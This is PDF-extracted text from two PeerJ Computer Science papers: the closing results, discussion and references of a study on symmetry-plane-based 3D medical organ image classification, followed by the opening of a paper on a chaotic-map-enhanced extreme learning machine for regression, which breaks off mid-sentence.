2 Performance comparison with similar existing methods (with data augmentation by random transformation and axis swapping on training data). Best performance per metric per database is highlighted in bold. Database Methodology Accuracy Sensitivity Specificity Precision F-Measure G-Mean Jin et al. (2017) 0.9222 0.9222 0.9741 0.9225 0.9213 0.9478 Qayyum et al. (2017) 0.9042 0.9042 0.9681 0.9082 0.9037 0.9356 Prasoon et al. (2013) 0.9375 0.9375 0.9792 0.9387 0.9370 0.9581 Ahn (2017) 0.9597 0.9597 0.9866 0.9607 0.9595 0.9731 Original Proposed 0.9903 0.9903 0.9968 0.9903 0.9903 0.9935 Jin et al. (2017) 0.9139 0.9139 0.9713 0.9139 0.9132 0.9422 Qayyum et al. (2017) 0.8931 0.8931 0.9644 0.9023 0.8917 0.9280 Prasoon et al. (2013) 0.9306 0.9306 0.9769 0.9314 0.9296 0.9534 Ahn (2017) 0.9375 0.9375 0.9792 0.9409 0.9368 0.9581 Transformed Proposed 0.9681 0.9681 0.9894 0.9682 0.9678 0.9786 Jin et al. (2017) 0.8903 0.8903 0.9634 0.8910 0.8894 0.9261 Qayyum et al. (2017) 0.8597 0.8597 0.9532 0.8811 0.8604 0.9053 Prasoon et al. (2013) 0.9028 0.9028 0.9676 0.9039 0.9018 0.9346 Ahn (2017) 0.9194 0.9194 0.9731 0.9222 0.9190 0.9459 Axis Swapped Proposed 0.9653 0.9653 0.9884 0.9658 0.9652 0.9768 Table 3 Comparison of training time with similar existing methods. Method Pre-processing Time (m) Training Time (m) Total Time (m) Jin et al. (2017) 240 1230 1470 Qayyum et al. (2017) N/A 2732 2732 Prasoon et al. (2013) 1012 23 1035 Ahn (2017) 27 7252 7279 Proposed 232 20 252 classification of some random examples using the proposed method, along with corresponding confidence levels. Performance when used with other DCNNs We also investigated the performance of our method when used with some existing state- of-the-art DCNNs: AlexNet (Krizhevsky, Sutskever & Hinton, 2012), GoogLeNet (Szegedy et al., 2015), ResNet-50 (He et al., 2016), and VGG-16 (Simonyan & Zisserman, 2014). To enable these DCNNs to be used in our algorithm, we normalized the 2D images (extracted from the plane of best symmetry) prior to the classification depending on the requirements of each DCNN. The single channel 2D grey scale images were converted to three-channel colour images and resized to the size of 127×127×3 for AlexNet and 224×224×3 for GoogLeNet, ResNet-50, and VGG-16. The performance results are shown in Table 4. Performance when used with conventional classifiers As conventional classification approaches, in concert with image feature extraction methods, have been used extensively for image classification, we also explored how to integrate the concepts discussed here with these methods. For this purpose, we used two Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181 Figure 8 Performance (confidence level of classification) of the proposed method with respect to some random images: (A) Abdomen, 85.7%, (B) Abdomen, 92.3%, (C) Abdomen, 94.2%, (D) Head, 99.9%, (E) Head, 100%, (F) Head, 98.8%, (G) Breast, 100%, (H) Breast, 100%, (I) Breast, 100%, (J) Thorax, 98.9%, (K) Thorax, 98.9%, and (L) Thorax, 99.7%. The images show the views extracted using the pro- posed algorithm from 3D CT and MRI images in the test databases. Note that the differences in the im- ages of the same class are caused by the simplicity of the segmentation method which influences the symmetry plane extraction. Full-size DOI: 10.7717/peerjcs.181/fig-8 Table 4 Performance of the proposed algorithm when used with other state-of-the-art DCNN models. Database Methodology Accuracy Sensitivity Specificity Precision F-Measure G-Mean AlexNet 0.9958 0.9958 0.9986 0.9958 0.9958 0.9972 GoogLeNet 0.9986 0.9986 0.9995 0.9986 0.9986 0.9991 ResNet-50 0.9972 0.9972 0.9991 0.9973 0.9972 0.9981 Original VGG-16 0.9708 0.9708 0.9903 0.9717 0.9708 0.9805 AlexNet 0.9944 0.9944 0.9981 0.9945 0.9944 0.9963 GoogLeNet 0.9931 0.9931 0.9977 0.9931 0.9931 0.9954 ResNet-50 0.9958 0.9958 0.9986 0.9958 0.9958 0.9972 Transformed VGG-16 0.9653 0.9653 0.9884 0.9664 0.9653 0.9768 AlexNet 0.9931 0.9931 0.9977 0.9931 0.9931 0.9954 GoogLeNet 0.9917 0.9917 0.9972 0.9917 0.9916 0.9944 ResNet-50 0.9931 0.9931 0.9977 0.9930 0.9930 0.9954 Axis Swapped VGG-16 0.9639 0.9639 0.9880 0.9650 0.9640 0.9759 image feature extraction methods: bag of words (BoW) (Harris, 1954) and histogram of oriented gradients (HoG) (Dalal & Triggs, 2005). To perform the classification task, we used support vector machines (SVMs) and artificial neural networks (ANNs) as they are widely used in classification. Here we used five-fold cross-validation for the SVM and 10 hidden neurons for the ANN. We normalised the 2D image slices resulting from the symmetry plane calculation to the size of 224×224. The performance of these approaches is shown in Table 5. DISCUSSION From the results in Table 1, we observe that the proposed method is better than other similar methods (except for Ahn (2017) which shows slightly better performance) when Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 11/16 https://peerj.com https://doi.org/10.7717/peerjcs.181/fig-8 http://dx.doi.org/10.7717/peerj-cs.181 Table 5 Performance of the proposed algorithm when used with conventional machine learning approaches. Database Methodology Accuracy Sensitivity Specificity Precision F-Measure G-Mean BoW+SVM 0.8083 0.8083 0.9361 0.8112 0.8047 0.8699 BoW+ANN 0.7667 0.7667 0.9222 0.7927 0.7568 0.8409 HoG+SVM 0.8500 0.8500 0.9500 0.8648 0.8470 0.8986 Original HoG+ANN 0.7472 0.7472 0.9157 0.7983 0.7221 0.8272 BoW+SVM 0.7944 0.7944 0.9315 0.7992 0.7908 0.8602 BoW+ANN 0.7542 0.7542 0.9181 0.7820 0.7423 0.8321 HoG+SVM 0.8375 0.8375 0.9458 0.8549 0.8334 0.8900 Transformed HoG+ANN 0.7458 0.7458 0.9153 0.8113 0.7240 0.8262 BoW+SVM 0.7903 0.7903 0.9301 0.7923 0.7864 0.8573 BoW+ANN 0.7500 0.7500 0.9167 0.7773 0.7350 0.8292 HoG+SVM 0.8361 0.8361 0.9454 0.8556 0.8324 0.8891 Axis Swapped HoG+ANN 0.7361 0.7361 0.9120 0.7982 0.7136 0.8194 applied to data that satisfied the conditions of consistent patient orientation and imaging direction when trained on the original (unaugmented) training database. However, Ahn (2017) uses 3D DCNNs in their classification and therefore, has a much slower training time when compared to the proposed method. As shown in Table 3, even with a relatively higher pre-processing time, our method is the fastest in terms of total training time. Also from Table 1, we can see that the proposed method outperforms the other methods in the face of changes in patient orientation and imaging direction. Although observe that some methods such as Ahn (2017) and Prasoon et al. (2013) are robust against patient orientation to some degree, they also fail when dealing with changes to imaging direction. Performance of the compared methods on transformed and axis swapped data is improved when trained on augmented data, as seen in Table 2. This is the result of the classifiers being trained on images of different orientations. However, the proposed method outperforms the other methods even when training was performed on augmented data. Also, the results imply that data augmentation in the training phase is not required for our method. The high accuracy of the proposed method, specifically on transformed data, is mainly due to the fact that a relatively consistent 2D cross-sectional view of a 3D image is being used to represent the 3D image irrespective of orientation. As such, the variation in the input data per class is minimal and therefore, better classification can be achieved. Comparison results shown in Table 3 reflect the robustness of the proposed method irrespective of the DCNN architecture used in the classification step. The performance results of the classifiers SVM and ANN, when combined with the feature extraction methods of BoW and HoG, show consistent but lower results (Table 4). This indicates that DCNNs may be better suited for our application. The salient feature of this algorithm is its simplicity. First, we reduced the 3D classification problem to a 2D one by extracting the 2D image lying on the plane of best symmetry from the 3D volume. In this operation, we used calculations that were most efficient, such as simple thresholding techniques. It can be argued that using more sophisticated methods Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181 of segmentation would enable more accurate symmetry plane calculation, which in turn would make the 2D views extracted more consistent. Furthermore, we rescaled the data to an 8-bit representation (intensity range of [0 255]), thereby reducing the resolution of the data. However, we found that even in the face of such simplifications, the proposed method displayed very high levels of performance. As such, we can conclude that it has achieved a good balance between efficiency and accuracy. Although the human body is roughly symmetric, most of the organs and how they are aligned inside the body are not perfectly symmetrical. Furthermore, the data we considered here was from a cancer database where there is further asymmetry caused by tumors, lesions etc. Our method was observed to perform well in these circumstances. However, we did not consider the effect of more exaggerated forms of asymmetry, for example, that caused by parts of an organ being cut off due to improper patient alignment. In the future, we will investigate how these forms of asymmetry affect the proposed method and how to compensate for them. We will also explore how it performs on other databases with higher numbers of classes. CONCLUSION In this paper, we proposed a 3D organ image classification approach which is robust against patient orientation and changes in imaging direction. To this end, we extracted the plane of best symmetry from the 3D image and extracted the 2D image corresponding to that plane. Then, we used a DCNN to classify the 2D image into one of four classes. We showed that this method is not only efficient and simple, but is also highly accurate in comparison to other similar methods. We also showed that this algorithm can be used in concert with other state-of-the-art DCNN models and also conventional classification techniques in combination with feature extraction methods. Although our algorithm was specifically developed for 3D organ image classification, it is applicable to any classification task where a 2D image extracted from the plane of best symmetry of the 3D image is sufficient to represent the 3D image. ACKNOWLEDGEMENTS The authors would like to thank Dr. Bridget Copson of the Department of Medical Imaging at St. Vincent’s Hospital, Melbourne, Australia, for her input on imaging techniques. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the University of Melbourne under the Melbourne Research Scholarship (MRS). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: University of Melbourne. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181 Competing Interests The authors declare there are no competing interests. Author Contributions • Kh Tohidul Islam and Sudanthi Wijewickrema conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Stephen O’Leary conceived and designed the experiments, contributed reagents/ma- terials/analysis tools, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available in the Supplemental Information 1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.181#supplemental-information. REFERENCES Ahn BB. 2017. The compact 3D convolutional neural network for medical images. Stanford: Standford University. Arias J, Martínez-Gómez J, Gámez JA, De Herrera AGS, Müller H. 2016. Medical image modality classification using discrete Bayesian networks. Computer Vision and Image Understanding 151:61–71 DOI 10.1016/j.cviu.2016.04.002. Besl P, McKay ND. 1992. A method for registration of 3-D shapes. IEEE Transactions on Pattern Analysis and Machine Intelligence 14(2):239–256 DOI 10.1109/34.121791. Bicacro E, Silveira M, Marques JS. 2012. Alternative feature extraction methods in 3D brain image-based diagnosis of Alzheimer’s disease. In: 2012 19th IEEE international conference on image processing. Piscataway: IEEE DOI 10.1109/icip.2012.6467090. Chan T, Vese L. 2001. Active contours without edges. IEEE Transactions on Image Processing 10(2):266–277 DOI 10.1109/83.902291. Cicconet M, Hildebrand DGC, Elliott H. 2017. Finding mirror symmetry via reg- istration and optimal symmetric pairwise assignment of curves. In: 2017 IEEE international conference on computer vision workshops (ICCVW). Piscataway: IEEE DOI 10.1109/iccvw.2017.206. Clark K, Vendt B, Smith K, Freymann J, Kirby J, Koppel P, Moore S, Phillips S, Maffitt D, Pringle M, Tarbox L, Prior F. 2013. The Cancer Imaging Archive (TCIA): maintaining and operating a public information repository. Journal of Digital Imaging 26(6):1045–1057 DOI 10.1007/s10278-013-9622-7. Cui X, Liu Y, Shan S, Chen X, Gao W. 2007. 3D haar-like features for pedestrian detection. Piscataway: IEEE DOI 10.1109/icme.2007.4284887. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 14/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.181#supplemental-information http://dx.doi.org/10.7717/peerj-cs.181#supplemental-information http://dx.doi.org/10.7717/peerj-cs.181#supplemental-information http://dx.doi.org/10.1016/j.cviu.2016.04.002 http://dx.doi.org/10.1109/34.121791 http://dx.doi.org/10.1109/icip.2012.6467090 http://dx.doi.org/10.1109/83.902291 http://dx.doi.org/10.1109/iccvw.2017.206 http://dx.doi.org/10.1007/s10278-013-9622-7 http://dx.doi.org/10.1109/icme.2007.4284887 http://dx.doi.org/10.7717/peerj-cs.181 Dalal N, Triggs B. 2005. Histograms of oriented gradients for human detection. In: 2005 IEEE computer society conference on computer vision and pattern recognition (CVPR’05), volume 1. Piscataway: IEEE, 886–893 DOI 10.1109/cvpr.2005.177. Harris ZS. 1954. Distributional structure. WORD 10(2–3):146–162 DOI 10.1080/00437956.1954.11659520. He K, Zhang X, Ren S, Sun J. 2016. Deep residual learning for image recognition. In: 2016 IEEE conference on computer vision and pattern recognition (CVPR). Piscataway: IEEE DOI 10.1109/cvpr.2016.90. Iandola FN, Han S, Moskewicz MW, Ashraf K, Dally WJ, Keutzer K. 2016. Squeezenet: alexnet-level accuracy with 50x fewer parameters and < 0.5 mb model size. ArXiv preprint. arXiv:1602.07360. Japkowicz N. 2006. Why question machine learning evaluation methods. In: AAAI workshop on evaluation methods for machine learning. New York: ACM, 6–11. Jin T, Cui H, Zeng S, Wang X. 2017. Learning deep spatial lung features by 3d convo- lutional neural network for early cancer detection. In: 2017 international conference on digital image computing: techniques and applications (DICTA). Piscataway: IEEE DOI 10.1109/dicta.2017.8227454. Krizhevsky A, Sutskever I, Hinton GE. 2012. ImageNet classification with deep convolutional neural networks. In: Pereira F, Burges CJC, Bottou L, Weinberger KQ, eds. Advances in neural information processing systems 25. Lake Tahoe: Curran Associates, Inc., 1097–1105. Kumar A, Kim J, Cai W, Fulham M, Feng D. 2013. Content-based medical image retrieval: a survey of applications to multidimensional and multimodality data. Journal of Digital Imaging 26(6):1025–1039 DOI 10.1007/s10278-013-9619-2. Liu K, Kang G. 2017. Multiview convolutional neural networks for lung nodule clas- sification. International Journal of Imaging Systems and Technology 27(1):12–22 DOI 10.1002/ima.22206. Liu Y, Dellaert F. 1998. A classification based similarity metric for 3D image re- trieval. In: Proceedings. 1998 IEEE computer society conference on computer vi- sion and pattern recognition (Cat. No.98CB36231). Piscataway: IEEE, 800–805 DOI 10.1109/CVPR.1998.698695. MathWorks, Inc. 1998. MATLAB. Natick: MathWorks, Inc. Available at https://www. mathworks.com/products/matlab.html. Miklos P. 2004. Image interpolation techniques. In: 2nd Siberian-Hungarian joint symposium on intelligent systems. Mohan G, Subashini MM. 2018. MRI based medical image analysis: survey on brain tumor grade classification. Biomedical Signal Processing and Control 39:139–161 DOI 10.1016/j.bspc.2017.07.007. Morgado P, Silveira M, Marques JS. 2013. Diagnosis of Alzheimer’s disease using 3D local binary patterns. Computer Methods in Biomechanics and Biomedical Engineering: Imaging & Visualization 1(1):2–12 DOI 10.1080/21681163.2013.764609. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 15/16 https://peerj.com http://dx.doi.org/10.1109/cvpr.2005.177 http://dx.doi.org/10.1080/00437956.1954.11659520 http://dx.doi.org/10.1109/cvpr.2016.90 http://arXiv.org/abs/1602.07360 http://dx.doi.org/10.1109/dicta.2017.8227454 http://dx.doi.org/10.1007/s10278-013-9619-2 http://dx.doi.org/10.1002/ima.22206 http://dx.doi.org/10.1109/CVPR.1998.698695 https://www.mathworks.com/products/matlab.html https://www.mathworks.com/products/matlab.html http://dx.doi.org/10.1016/j.bspc.2017.07.007 http://dx.doi.org/10.1080/21681163.2013.764609 http://dx.doi.org/10.7717/peerj-cs.181 Nair V, Hinton GE. 2010. Rectified linear units improve restricted boltzmann machines. In: Proceedings of the 27th international conference on international conference on machine learning, ICML’10. Madison: Omnipress, 807–814. Olson DL, Delen D. 2008. Advanced data mining techniques. Springer, Berlin, Heidel- berg: Springer Science & Business Media DOI 10.1007/978-3-540-76917-0. Otsu N. 1979. A threshold selection method from gray-level histograms. IEEE Transac- tions on Systems, Man, and Cybernetics 9(1):62–66 DOI 10.1109/tsmc.1979.4310076. Öziç MÜ, Özşen S. 2017. T-test feature ranking based 3D MR classification with VBM mask. In: 2017 25th signal processing and communications applications conference (SIU). Piscataway: IEEE DOI 10.1109/siu.2017.7960591. Powers DM. 2011. Evaluation: from precision, recall and F-measure to ROC, in- formedness, markedness and correlation. Journal of Machine Learning Technologies 2(1):37–63. Prasoon A, Petersen K, Igel C, Lauze F, Dam E, Nielsen M. 2013. Deep feature learning for knee cartilage segmentation using a triplanar convolutional neural network. In: Advanced information systems engineering. Springer, Berlin, Heidelberg: Springer Berlin Heidelberg, 246–253 DOI 10.1007/978-3-642-40763-5_31. Qayyum A, Anwar SM, Awais M, Majid M. 2017. Medical image retrieval using deep convolutional neural network. Neurocomputing 266:8–20 DOI 10.1016/j.neucom.2017.05.025. Research and Markets. 2018. Medical imaging market—global outlook and forecast 2018–2023. Available at https://www.researchandmarkets.com/reports/4455446/ (accessed on 22 October 2018). Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. ArXiv preprint. arXiv:1409.1556. Szegedy C, Liu W, Jia Y, Sermanet P, Reed S, Anguelov D, Erhan D, Vanhoucke V, Rabinovich A. 2015. Going deeper with convolutions. In: 2015 IEEE con- ference on computer vision and pattern recognition (CVPR). Piscataway: IEEE DOI 10.1109/cvpr.2015.7298594. Teverovskiy L, Li Y. 2006. Truly 3D midsagittal plane extraction for robust neuroimage registration. In: 3rd IEEE international symposium on biomedical imaging: macro to nano, 2006. Piscataway: IEEE, 860–863 DOI 10.1109/isbi.2006.1625054. Tuzikov AV, Colliot O, Bloch I. 2003. Evaluation of the symmetry plane in 3D MR brain images. Pattern Recognition Letters 24(14):2219–2233 DOI 10.1016/s0167-8655(03)00049-7. Zhou X, Hayashi T, Hara T, Fujita H, Yokoyama R, Kiryu T, Hoshi H. 2006. Automatic segmentation and recognition of anatomical lung structures from high-resolution chest CT images. Computerized Medical Imaging and Graphics 30(5):299–313 DOI 10.1016/j.compmedimag.2006.06.002. Islam et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.181 16/16 https://peerj.com http://dx.doi.org/10.1007/978-3-540-76917-0 http://dx.doi.org/10.1109/tsmc.1979.4310076 http://dx.doi.org/10.1109/siu.2017.7960591 http://dx.doi.org/10.1007/978-3-642-40763-5_31 http://dx.doi.org/10.1016/j.neucom.2017.05.025 https://www.researchandmarkets.com/reports/4455446/ http://arXiv.org/abs/1409.1556 http://dx.doi.org/10.1109/cvpr.2015.7298594 http://dx.doi.org/10.1109/isbi.2006.1625054 http://dx.doi.org/10.1016/s0167-8655(03)00049-7 http://dx.doi.org/10.1016/j.compmedimag.2006.06.002 http://dx.doi.org/10.7717/peerj-cs.181 work_wlsykhomgjaxpjeqdsgd7bqasi ---- DCS-ELM: a novel method for extreme learning machine for regression problems and a new approach for the SFRSCC DCS-ELM: a novel method for extreme learning machine for regression problems and a new approach for the SFRSCC Osman Altay, Mustafa Ulas and Kursat Esat Alyamac Firat University, Elazig, Turkey ABSTRACT Extreme learning machine (ELM) algorithm is widely used in regression and classification problems due to its advantages such as speed and high-performance rate. Different artificial intelligence-based optimization methods and chaotic systems have been proposed for the development of the ELM. However, a generalized solution method and success rate at the desired level could not be obtained. In this study, a new method is proposed as a result of developing the ELM algorithm used in regression problems with discrete-time chaotic systems. ELM algorithm has been improved by testing five different chaotic maps (Chebyshev, iterative, logistic, piecewise, tent) from chaotic systems. The proposed discrete-time chaotic systems based ELM (DCS-ELM) algorithm has been tested in steel fiber reinforced self- compacting concrete data sets and public four different datasets, and a result of its performance compared with the basic ELM algorithm, linear regression, support vector regression, kernel ELM algorithm and weighted ELM algorithm. It has been observed that it gives a better performance than other algorithms. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science Keywords Extreme learning machine, Discrete-time chaotic systems, Chaotic maps, Regression algorithm, SFRSCC INTRODUCTION Feed-forward neural networks have been widely used since they were proposed (Rumelhart, Hinton & Williams, 1986). Traditional feed-forward neural networks generally use the first-order gradient method to optimize parameters. Feed-forward neural networks suffer from problems such as low convergence and local minimums (Huang et al., 2015). To deal with this problem, researchers have proposed different methods. These include feed-forward artificial neural network models developed with optimization methods such as artificial bee colony (Karaboga, Akay & Ozturk, 2007), hybrid particle swarm optimization (Al-kazemi & Mohan, 2002), differential evolution (Ilonen, Kamarainen & Lampinen, 2003) and genetic algorithm (Montana & Davis, 1989) during training. However, these methods still cannot provide the global optimal solution and need to be improved. Lack of fast learning algorithms in artificial neural networks, training of artificial neural networks using traditional methods took hours and even days caused the need for a new method. As a result, the extreme learning machine (ELM) algorithm has emerged and ELM algorithm has been proposed by Huang, Zhu & Siew (2006). ELM is used to train How to cite this article Altay O, Ulas M, Alyamac KE. 2021. DCS-ELM: a novel method for extreme learning machine for regression problems and a new approach for the SFRSCC. PeerJ Comput. Sci. 7:e411 DOI 10.7717/peerj-cs.411 Submitted 6 November 2020 Accepted 3 February 2021 Published 12 March 2021 Corresponding author Osman Altay, oaltay@firat.edu.tr Academic editor Ka-Chun Wong Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.411 Copyright 2021 Altay et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.411 mailto:oaltay@�firat.�edu.�tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.411 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ single-layer feed-forward neural networks (SLFNs). It has been shown in various articles that the ELM algorithm provides a better global optimal solution when compared to traditional feed-forward neural networks. Theoretical studies have shown that even with randomly generated hidden nodes, ELM retains universal convergence ability over SLFNs. Different versions of the ELM algorithm developed with different optimization methods and chaotic systems have been proposed in order to give a better global optimum solution. In 2005, Zhu et al. (2005) proposed the Evolutionary ELM algorithm using the differential evolutionary algorithm method. An ELM algorithm using the particle swarm optimization method was proposed by Xu & Shu (2006). In addition to these, an ELM algorithm developed by using different evolutionary optimization algorithms has also been proposed (Zhu et al., 2005; Xu & Shu, 2006; Silva, Pacifico & Ludermir, 2011). In addition to artificial intelligence-based optimization algorithms, there is also an ELM algorithm developed using chaotic systems (Huang et al., 2017; Yang, Wang & Yuan, 2013). Chaotic systems have also been used to develop optimization methods used in the ELM algorithm. Examples of these are the chaotic salp swarm optimization method (Mohanty et al., 2020) and the ELM algorithm improved by the chaotic moth-flame optimization method (Wang et al., 2017). In this study, assignment of weight values and bias values was based on a determination using chaotic maps, not randomly. In the basic ELM algorithm, weight and bias values are assigned randomly. The random selection of bias and weight values seems to be the biggest obstacle to achieving the desired global optimum solution as a result of insufficient dispersion of the distributions. This causes repetition and generation of the same values when high values are needed due to the irregular operation of the random command (Yang, Wang & Yuan, 2013; Mohanty et al., 2020; Wang et al., 2017). Chaotic system classes can be listed as discrete time, continuous time, time delay and hyper-chaotic systems. Each of these chaotic classes of systems has its own advantages and disadvantages. Discrete-time chaotic systems are used to determine the weight and bias values. Discrete-time chaotic systems have a significant advantage over other chaotic system models due to their high performance in computer applications with their simple mathematical models. It is aimed to find the best bias and weight parameters by using discrete-time chaotic systems. It was observed that the proposed algorithm in the study achieved better results when compared with the basic ELM algorithm, linear regression (LR), support vector regression (SVR), kernel ELM (KELM) and weighted ELM (WELM). In particular, the proposed algorithm has found a better and generalized solution in data sets where the number of hidden neurons increases and long training period. A discrete-time chaotic systems-based extreme learning machine (DCS-ELM) algorithm has been proposed using discrete-time chaotic systems to improve the performance of the extreme learning machine algorithm. In the proposed algorithm, Chebyshev, iterative, logistic, piecewise and tent map discrete-time chaotic systems are used. The proposed DCS-ELM algorithm has been tested in 8 different data sets and it has been found to give better results in most of them. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 2/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ EXTREME LEARNING MACHINE Feed-forward neural networks are widely used in many different areas due to their capabilities. The first is to predict nonlinear mapping methods using direct input samples. The second is; It can offer models for natural and artificial classes. Lack of fast learning algorithms in artificial neural networks, training of artificial neural networks using traditional methods took hours and even days caused the need for a new method. As a result, the ELM algorithm has emerged (Huang, Zhu & Siew, 2006). Traditionally, all parameters of feed forward networks have to be set (Gurgenc et al., 2020). For this reason, there is a dependency relationship between bias and weight values between different layers. Gradient descent based methods are mainly used in various learning algorithms of feed forward neural networks. Gradient descent based methods are sometimes very slow or can easily approach the local minimum. Too many iterations may be required to achieve better learning. Feed forward networks can be thought of as a linear model after the input weights and hidden layer trends are randomly selected. Output weights of feedforward networks can be determined analytically by simple generalized inverse study of hidden layer output matrices. The exit logic of ELM is also based on this situation and it has been shown in different data sets that it is a much faster and generalized model compared to traditional artificial neural networks (Huang, Zhu & Siew, 2006). GRADIENT-BASED SOLUTION The gradient-based solution has traditionally been used to train single-hidden layer feed forward neural networks. Specifically, it is used to find the values of ~wi; ~bi; ~b; i ¼ð 1; . . . ; ~NÞ (Huang, Zhu & Siew, 2006) and its shown in Eq. (1). kHð~w1; . . . ; ~w~N; ~b1; . . . ; ~bNÞb � Tk ¼ min wibibkH ~w1; . . . ; ~w~N; ~b1; . . . ; ~bN � � b � Tk (1) This corresponds to the minimum value of the cost function (Eq. (2)); E ¼ XN j¼1 X~N i¼1 big wi � xj þ bi � � � tj � �2 (2) If the H value is unknown in the gradient-based learning algorithm, the algorithm usually starts looking for the minimum value of Hb � T. In the gradient-based minimization process, the weights wi; bið Þ and the bias value are expressed as bi. W parameter is iteratively adjusted as Eq. (3) (Huang, Zhu & Siew, 2006). Wk ¼ Wk�1 � n @E Wð Þ @W (3) Here n is learning rate. The learning algorithm popularly used in feedforward neural networks is a back propagation learning algorithm that can be efficiently calculated by Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 3/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ the propagation of gradients from output to input. There are several problems with the back propagation learning algorithm (Huang, Zhu & Siew, 2006; Ulas et al., 2019); � When the learning rate n value is small, the learning algorithm converges very slowly. When the value of n is large, the algorithm becomes unstable and diverges. � One of the factors affecting the backpropagation learning algorithm is the presence of local minimums. It is not desired that the learning algorithm stop at the local minimum instead of the global minimum. � Artificial neural network; He may have over-trained or poor generalization performance using the back propagation learning algorithm. Therefore, valid and appropriate stopping methods are required in the cost function reduction procedure. � Gradient-based learning takes a lot of time in most applications. In the ELM algorithm proposed to solve these problems in gradient-based algorithms, these problems have been eliminated and a more efficient learning algorithm is obtained for feed-forward neural networks (Huang, Zhu & Siew, 2006). LEAST SQUARES NORM Unlike traditional function approximation theories that require adjusting input weights and hidden layer bias, input weights and hidden layer bias values can be assigned randomly only if the activation function is infinitely different. Contrary to the common understanding that all parameters of feedforward neural networks need to be tuned, the input weights and bias values in the hidden layer do not need to be adjusted, and the hidden layer output matrix H can actually remain unchanged. The linear system is the analysis of Hb ¼ T with the least squares norm b̂. The solution for this is given in Eq. (4). H w1; . . . ; w�N; b1; . . . ; nN̂ � � b̂ � T ¼ min b H w1; . . . ; w�N; b1; . . . ; nN̂ � � b � T (4) If the N̂ number of hidden nodes is equal to the N number of samples, and the H matrix is square and reversible, the input weight vectors wi and hidden bias values bi can be chosen randomly. However, in most real problems, the number of hidden nodes is much less than the number of different training instances. H is a non-square matrix. There may be conditions that cannot be met at Hb ¼ T. The smallest norm leasts squares solution of linear system is given in the Eq. (5). b ¼ H�T (5) Here, the inverse of the H matrix is taken using Moore–Penrose, H�. In short, ELM, in a given training set @ ¼ xi; tið Þ k xi 2 Rn; ti 2 Rm; i ¼ 1; . . . ; Nf g, activation function g xð Þ and hidden nodes ~N; Step 1: Assign randomly; weight wi and bias value bi, i ¼ 1; . . . ; ~N. Step 2: Compute the hidden layer output matrix H. Step 3: Calculate the output weight b ¼ H�T, T ¼ t1; . . . ; tN½ �T. The inverse of the H matrix is taken using Moore–Penrose H�. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 4/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In summary, in the ELM algorithm; It is randomly generated with the weight and bias values adjusted. Traditional feed forward neural networks train the network recursively, while in the ELM algorithm, the process is done analytically (Bilhan et al., 2018). n the ELM algorithm, Moore–Penrose generalized inversed has been used to eliminate the disadvantages of recursive learning algorithms (Altay & Ulas, 2019). In this way, a nonlinear system has been transformed into a linear system (Huang, Zhu & Siew, 2006; Huang et al., 2011). The basic representation of the ELM algorithm is given in Fig. 1. Activation function Different activation functions are used in ELM as in artificial neural networks. There is no input information about which activation function will be used according to the problem. Activation functions are completely determined by trial and error methods. Hard limit, sine and sigmoid activation functions were used in the DCS-ELM algorithm suggested in the study. Hard limit activation function is shown in Eq. (6) (Huang et al., 2011). G a; b; xð Þ ¼ 1; if a � x � b � 0 0; otherwise � (6) Chaos theorem Chaos has been in every event since the existence of the world. Chaos basically has a certain stable and unique structure. Chaotic systems are able to be stable as long as they can Figure 1 Basic representation of ELM. Full-size DOI: 10.7717/peerj-cs.411/fig-1 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 5/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-1 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ withstand different disturbing effects from the outside of their own disorder (Baykal & Beyan, 2004). There are differences between chaotic systems and random systems. Although chaos and random systems are perceived as the same by many, there is a very basic and distinctive difference between them. This difference is that chaotic systems have an order in disorder. After the concept of chaos emerged, people working in this field regarded order as spontaneous systems in chaotic systems and observed that irregular behavior was a creative process (Baykal & Beyan, 2004). Chaotic systems can be defined as systems with unpredictable and random behavior with the shortest definition. The most basic feature of chaos is that it depends on the initial conditions. In a chaotic system, although the initial conditions are very close to each other, its orbits have no relation with each other and the orbits diverge from each other. There is very little difference between very close values that occur in initial conditions and this difference can be considered as measurement error. In contrast, chaotic systems increase exponentially and the state of the system becomes indeterminable after a short time. Chaotic systems are deterministic, contrary to popular belief, and should not be confused with stochastic systems. In a system, chaos is not a random external effect, but the internal dynamics of the system itself (Baykal & Beyan, 2004; Ozer, 